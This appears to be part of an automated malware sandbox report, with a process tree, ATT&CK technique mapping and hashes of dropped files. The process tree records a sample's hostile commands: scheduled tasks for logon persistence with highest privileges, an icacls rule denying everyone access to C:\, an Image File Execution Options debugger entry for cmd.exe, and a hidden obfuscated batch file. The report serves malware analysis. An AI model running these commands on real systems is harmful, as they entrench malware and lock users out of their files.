C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"6⤵
- Executes dropped EXE
PID:5008 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "$sxr-powershell" /f6⤵PID:3236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1840
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ksSpuRqAVYRn.bat" "6⤵PID:3808
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4056
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:1716
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"6⤵PID:4956
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
PID:2244 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
PID:3600 -
C:\Windows\system32\icacls.exeicacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T3⤵
- Modifies file permissions
PID:3664 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f3⤵PID:3656
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"3⤵
- Views/modifies file attributes
PID:3980 -
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe"2⤵PID:2852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3580
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3760
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3912
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Checks SCSI registry key(s)
- Modifies registry class
PID:696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:3244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5064
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1004
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4092
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4628
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4912
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1952
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2768
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3240
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:976
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 8c29ba0b1ea5f00a08eef5227ff772e8 cBtgpcY4hEqlj0f3kK09zw.0.1.0.0.01⤵
- Sets service image path in registry
PID:2356 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4812
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:64
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4868
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4432
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:1136
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵PID:2884
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:2332
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1216
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
409KB
MD5404ab800bbe49c36bd64d0d73600b59a
SHA14c8dff2702fada108f7477ad357067310b584366
SHA2565465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154
SHA512d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
283B
MD50f3766ba648da74f5cdc9013218a7661
SHA1d58581a95ff6b657201d6958b28b7cbbcfd4f9be
SHA256d9b25238fdfdfd731bcc69318844e147b02d9c1e27caff03dc53eb162d9661b0
SHA512f6597e10eeaea0b24c6e2a20f0f2c0a6d879da0ac694009b77d5d18d1c2a6e0b4500e1a3182b5e5182a7b24d83177520b0845b41fc47d07e018dd58a4f8ec19a
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD539e7335d6b27147ba82cebb03f348f45
SHA1d340283071e106cefd111b6c0058b7ea7f2ee38c
SHA25688809d8a5e6ae13b10633539ec5eee82aaf0f5cdc2dfb06547413aec2c59ce4a
SHA512f348639c7b203c96ca60328270d938c39f1a6c4246ee74610033cba8fb04979407df07f9067acdde897026bf1315093b1d8e08691ce64dc5c3ac586e1a2cc527